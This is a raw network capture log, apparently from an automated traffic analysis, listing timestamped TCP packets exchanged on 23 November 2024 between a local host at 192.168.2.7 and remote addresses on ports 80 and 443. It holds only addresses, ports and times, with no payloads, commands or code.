                                                                                                                                                                                  Nov 23, 2024 19:52:45.366755962 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.370255947 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.370423079 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.453799009 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.453917980 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.453991890 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.455264091 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.455363035 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.455431938 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.458417892 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.459347010 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.459423065 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.459492922 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.462284088 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.462402105 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.462433100 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.465260029 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.465336084 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.465367079 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.468225002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.468328953 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.468333006 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.471223116 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.471302986 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.471366882 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.474159956 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.474268913 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.474272966 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.477161884 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.477251053 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.477267981 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.480211020 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.480293036 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.480360031 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.483089924 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.483181000 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.483195066 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.485601902 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.485646009 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.485646009 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.487998962 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.488053083 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.488071918 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.490540028 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.490595102 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.490642071 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.492866993 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.492924929 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.492963076 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.495289087 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.495335102 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.495362997 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.497756004 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.497834921 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.497844934 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.500189066 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.500250101 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.500277042 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.502470016 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.502516985 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.502574921 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.504798889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.504841089 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.504875898 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.507251978 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.507328987 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.507354975 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.509313107 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.509356022 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.509387970 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.511604071 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.511660099 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.511661053 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.513932943 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.514107943 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.514395952 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.516112089 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.516218901 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.516220093 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.518407106 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.518472910 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.518490076 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.520654917 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.520718098 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.520742893 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.522953033 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.523021936 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.523102045 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.525193930 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.525253057 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.525273085 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.527441025 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.527502060 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.527571917 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.529728889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.529783010 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.529861927 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.531972885 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.532061100 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.532125950 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.534280062 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.534374952 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.534408092 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.536632061 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.536704063 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.536726952 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.538815975 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.538868904 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.538883924 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.541099072 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.541162968 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.541203976 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.543365002 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.543451071 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.543520927 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.545650959 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.545702934 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.545777082 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.547892094 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.547966003 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.547985077 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.550180912 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.550231934 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.550239086 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.552416086 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.552539110 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.552824974 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.555047035 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.555164099 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.555197001 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.557023048 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.557094097 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.557095051 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.559256077 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.559333086 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.559355021 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.561513901 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.561597109 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.561613083 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.563769102 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.563817024 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.563878059 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.566049099 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.566153049 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.566164970 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.568300962 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.568375111 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.568407059 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.570573092 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.570705891 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.570743084 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.572853088 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.572992086 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.573040962 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.575089931 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.575193882 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.575223923 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.577375889 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.577454090 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.577491045 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.579654932 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.579726934 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.579787016 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.606185913 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.606759071 CET49761443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:45.606784105 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.607266903 CET49761443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:45.607273102 CET4434976113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.630328894 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.664676905 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.664803982 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.664901972 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.665298939 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.665389061 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.665504932 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.667412996 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.667503119 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.667557955 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.668876886 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.669007063 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.669056892 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.670656919 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.670783043 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.670860052 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.672534943 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.672631979 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.672684908 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.674280882 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.674391031 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.674448013 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.676064014 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.676207066 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.676256895 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.677858114 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.677978039 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.678036928 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.679816008 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.679845095 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.679946899 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.681489944 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.681622982 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.681667089 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.683238983 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.683343887 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.683397055 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.685045958 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.685137033 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.685185909 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.686873913 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.686969042 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.687019110 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.688401937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.688465118 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.688555956 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.689861059 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.689896107 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.689976931 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.691348076 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.691420078 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.691473961 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.692853928 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.692970037 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.693021059 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.694320917 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.694386005 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.694434881 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.695859909 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.696052074 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.696147919 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.697304964 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.697371960 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.697417021 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.698765039 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.698858976 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.698925018 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.700246096 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.700303078 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.700381041 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.701704025 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.701827049 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.701885939 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.703228951 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.703334093 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.703411102 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.704684973 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.704802036 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.704849958 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.706064939 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.706165075 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.706212044 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.707447052 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.707572937 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.707637072 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.708842039 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.708964109 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.709033012 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.710231066 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.710355043 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.710411072 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.711612940 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.712049007 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.712116003 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.713037014 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.713139057 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.713196039 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.714384079 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.714493990 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.714545965 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.715768099 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.715881109 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.715924978 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.717148066 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.717288971 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.717354059 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.718511105 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.718631983 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.718682051 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.719901085 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.720005035 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.720055103 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.721283913 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.721400023 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.721477032 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.722662926 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.722765923 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.722814083 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:45.724077940 CET8049760185.215.113.16192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:45.724174023 CET8049760185.215.113.16192.168.2.7
